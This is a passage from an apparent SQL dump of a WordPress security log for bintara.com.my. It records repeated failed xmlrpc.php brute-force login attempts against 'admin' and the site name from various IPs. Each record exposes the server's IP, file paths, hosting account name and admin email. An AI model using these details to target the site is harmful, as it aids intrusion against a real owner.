19:05:59',17683856,19174608,'https://bintara.com.my/wp-login.php',1,0,'185.22.92.226'),(23222,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"339\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQtjR90bn5mtr-PXqq0OQAAAEM\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"23.94.225.7\";s:11:\"REMOTE_PORT\";s:5:\"43326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQtjR90bn5mtr-PXqq0OQAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846349.8204\";s:12:\"REQUEST_TIME\";s:10:\"1566846349\";}}','notice','2019-08-26 19:05:52','2019-08-26 19:05:50',18300904,19499816,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'23.94.225.7'),(23221,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"339\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQthxTEVi0fEJEHuDZF5gAAABY\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"116.12.48.153\";s:11:\"REMOTE_PORT\";s:5:\"32876\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQthxTEVi0fEJEHuDZF5gAAABY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846343.2478\";s:12:\"REQUEST_TIME\";s:10:\"1566846343\";}}','notice','2019-08-26 19:05:45','2019-08-26 19:05:43',18299864,19500352,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'116.12.48.153'),(23220,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQtdBTEVi0fEJEHuDZF2gAAAAQ\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"89.46.106.243\";s:11:\"REMOTE_PORT\";s:5:\"43982\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQtdBTEVi0fEJEHuDZF2gAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846324.2472\";s:12:\"REQUEST_TIME\";s:10:\"1566846324\";}}','notice','2019-08-26 19:05:27','2019-08-26 19:05:24',18306912,19589504,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'89.46.106.243'),(23219,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQtdBTEVi0fEJEHuDZF3AAAABA\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.39.55\";s:11:\"REMOTE_PORT\";s:5:\"53746\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQtdBTEVi0fEJEHuDZF3AAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846324.8329\";s:12:\"REQUEST_TIME\";s:10:\"1566846324\";}}','notice','2019-08-26 19:05:26','2019-08-26 19:05:25',18303944,19507664,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'103.28.39.55'),(23218,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQtdIir4pgxiIHnHK4oDQAAAdI\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"67.225.212.6\";s:11:\"REMOTE_PORT\";s:5:\"32886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQtdIir4pgxiIHnHK4oDQAAAdI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846324.3372\";s:12:\"REQUEST_TIME\";s:10:\"1566846324\";}}','notice','2019-08-26 19:05:26','2019-08-26 19:05:24',18302224,19502504,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'67.225.212.6'),(23217,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQtJhTEVi0fEJEHuDZFvAAAAAo\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.130.120\";s:11:\"REMOTE_PORT\";s:5:\"55913\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQtJhTEVi0fEJEHuDZFvAAAAAo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846246.1465\";s:12:\"REQUEST_TIME\";s:10:\"1566846246\";}}','notice','2019-08-26 19:04:09','2019-08-26 19:04:06',18308256,19593248,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'182.50.130.120'),(23216,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQtCR90bn5mtr-PXqq0KAAAAEg\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"182.50.151.55\";s:11:\"REMOTE_PORT\";s:5:\"35378\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQtCR90bn5mtr-PXqq0KAAAAEg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846217.8879\";s:12:\"REQUEST_TIME\";s:10:\"1566846217\";}}','notice','2019-08-26 19:03:40','2019-08-26 19:03:38',18299840,19498392,'http://bintara.com.my/blog/xmlrpc.php',1,0,'182.50.151.55'),(23212,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 